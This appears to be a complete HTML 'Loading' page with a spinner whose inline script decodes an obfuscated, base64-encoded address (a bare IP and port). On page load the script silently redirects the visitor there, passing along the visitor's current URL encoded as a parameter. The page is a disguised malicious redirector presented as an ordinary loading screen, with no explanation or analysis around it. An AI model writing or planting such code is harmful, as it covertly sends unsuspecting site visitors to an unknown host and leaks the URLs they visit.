<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Loading</title>
</head>
<body>
    <div class="spinner">
        <div class="bounce1"></div>
        <div class="bounce2"></div>
        <div class="bounce3"></div>
    </div><a href="" id="onfaEOsa"></a>
    <script
        type="text/javascript">
        var strU = window.atob("aHR0cDovLzIzLjIyNS42Ny44MzozMzU1") + "/?r=" + window.btoa(window.location.href);
        onfaEOsa.href = strU; 
        if (document.all) { 
            console.log('click jump', strU)
            document.getElementById("onfaEOsa").click();             
        } else { 
            var e = document.createEvent("MouseEvents"); 
            console.log('MouseEvents jump', strU)
            e.initEvent("click", !0, !0), document.getElementById("onfaEOsa").dispatchEvent(e);             
        }
    </script>
</body>
</html>